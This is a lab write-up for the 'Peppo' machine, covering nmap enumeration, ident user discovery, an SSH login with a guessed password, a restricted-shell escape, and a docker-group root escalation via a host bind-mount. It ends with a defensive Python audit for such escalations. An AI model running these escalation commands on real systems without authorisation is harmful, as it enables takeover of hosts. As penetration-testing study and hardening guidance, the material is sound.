# Peppo

<figure><img src="/files/5dN9mT65RPg2ZDgh5m1z" alt=""><figcaption></figcaption></figure>

### Nmap

```
sudo nmap 192.168.100.60 -p- -sS -sV

PORT      STATE  SERVICE           VERSION
22/tcp    open   ssh               OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp    closed domain
113/tcp   open   ident             FreeBSD identd
5432/tcp  open   postgresql        PostgreSQL DB 9.6.0 or later
8080/tcp  open   http              WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
10000/tcp open   snet-sensor-mgmt?
```

Since `ident` is running, we can use the Perl script `ident-user-enum` to identify which user each listening service is running as.

<figure><img src="/files/6l7cfTAPJIr0No17fKMM" alt=""><figcaption></figcaption></figure>

Port 10000 reports it is running under the user 'Eleanor'. I tried brute-forcing the username on `SSH` and had no luck. Eventually, simply trying `eleanor:elenaor`, I was able to log in over SSH.

<figure><img src="/files/1KM0olbJZlxsC4UvofYM" alt=""><figcaption></figcaption></figure>

From trying the `id` command we see that we are locked in a restricted bash shell. We can check which commands are available to us by viewing what binaries we have access to.

<figure><img src="/files/a3vyGGDcs6zA8cxHDMOR" alt=""><figcaption></figcaption></figure>

Checking GTFOBins for whether any of these binaries can spawn a shell, and so escape the restricted one:

<figure><img src="/files/A3R6lhIziB2BxHBHa4YB" alt=""><figcaption></figcaption></figure>

After running the above command we can export a new `PATH`, spawn a proper shell via Python, and then export the `PATH` again so that we have full control over the shell session.

```bash
# Restore a normal search path so binaries outside the restricted set resolve
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
# Spawn an unrestricted bash via a pty
python -c 'import pty; pty.spawn("/bin/bash")'
# Set the path again inside the new shell
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
```

<figure><img src="/files/DQVAXcGe6Gr55z8cuzq3" alt=""><figcaption></figcaption></figure>

The command `id` shows we are a member of the `docker` group. GTFOBins again shows a method for spawning a root shell when we are a member of the `docker` group.

<figure><img src="/files/jiWcMkmsEXZ5S0NVTBxy" alt=""><figcaption></figcaption></figure>

First, check what images we have available to us:

```bash
docker image ls
```

We can use the GTFOBins command, replacing the placeholder `<alpine>` with one of the images listed above (here `redmine`):

```bash
# Bind-mount the host root filesystem into the container and chroot into it
docker run -v /:/mnt --rm -it redmine chroot /mnt sh
```

This returns a shell as root:

<figure><img src="/files/cWbsZIvT2AaA8vLC9dUm" alt=""><figcaption></figcaption></figure>
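As the defensive counterpart to the `docker` group escalation above, here is an added Python audit (example code written for this page, not part of the original write-up) that flags non-root members of the `docker` group in an `/etc/group` listing and scans recorded command lines for `docker run` invocations that bind-mount sensitive host paths or run privileged. The group file and the command lines are constructed samples; on a real host you would read `/etc/group` and feed in auditd `execve` records or shell history.

```python
import os
import shlex

# Constructed /etc/group content standing in for the real file.
GROUP_FILE = """\
root:x:0:
sudo:x:27:admin
docker:x:999:eleanor,ci
"""

# Constructed command lines of the kind auditd (execve) or shell history
# would record for a docker-group member.
COMMAND_LOG = [
    "docker image ls",
    "docker run --rm -it redmine sh",
    "docker run -v /:/mnt --rm -it redmine chroot /mnt sh",
    "docker run --privileged -it alpine sh",
    "docker run --mount type=bind,source=/etc,target=/host/etc alpine sh",
    "docker run -v /srv/app:/app:ro node:18 npm start",
]

# Host paths whose bind-mount into a container hands over the host.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/run/docker.sock")


def docker_group_members(group_text):
    """Return the users listed in the docker group of an /etc/group file."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [u for u in fields[3].split(",") if u]
    return []


def is_sensitive(host_path):
    """True if host_path is, or lies under, one of SENSITIVE_HOST_PATHS."""
    p = os.path.normpath(host_path)
    if p == "/":
        return True
    return any(p == s or p.startswith(s + "/")
               for s in SENSITIVE_HOST_PATHS if s != "/")


def host_path_from_volume(spec):
    """Host side of a -v/--volume spec (host:container[:opts]); a spec whose
    first part is not an absolute path is a named volume, not a bind mount."""
    host = spec.split(":", 1)[0]
    return host if host.startswith("/") else None


def risky_docker_run(cmd):
    """Reasons a 'docker run' command line should be flagged (empty = clean)."""
    argv = shlex.split(cmd)
    if argv[:2] != ["docker", "run"]:
        return []
    reasons = []
    i = 2
    while i < len(argv):
        tok = argv[i]
        host = None
        if tok == "--privileged":
            reasons.append("privileged container")
        elif tok in ("-v", "--volume") and i + 1 < len(argv):
            i += 1
            host = host_path_from_volume(argv[i])
        elif tok.startswith(("-v=", "--volume=")):
            host = host_path_from_volume(tok.split("=", 1)[1])
        elif tok == "--mount" and i + 1 < len(argv):
            i += 1
            opts = dict(kv.split("=", 1) for kv in argv[i].split(",") if "=" in kv)
            host = opts.get("source", opts.get("src"))
        if host is not None and is_sensitive(host):
            reasons.append(f"bind-mounts sensitive host path {host}")
        i += 1
    return reasons


def audit(group_text=GROUP_FILE, commands=COMMAND_LOG):
    """Combine both checks into a list of human-readable findings."""
    findings = [f"user {u} is in the docker group (root-equivalent access)"
                for u in docker_group_members(group_text) if u != "root"]
    for cmd in commands:
        for reason in risky_docker_run(cmd):
            findings.append(f"{reason}: {cmd}")
    return findings


if __name__ == "__main__":
    for finding in audit():
        print(finding)
```

Run against the samples, the audit reports `eleanor` and `ci` as docker-group members and flags the `-v /:/mnt`, `--privileged` and `--mount source=/etc` launches while leaving the read-only `/srv/app` mount alone. Membership of the `docker` group grants control of the Docker socket and is therefore root-equivalent; removing non-administrative users from the group, or moving to rootless Docker, closes the path this box uses.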

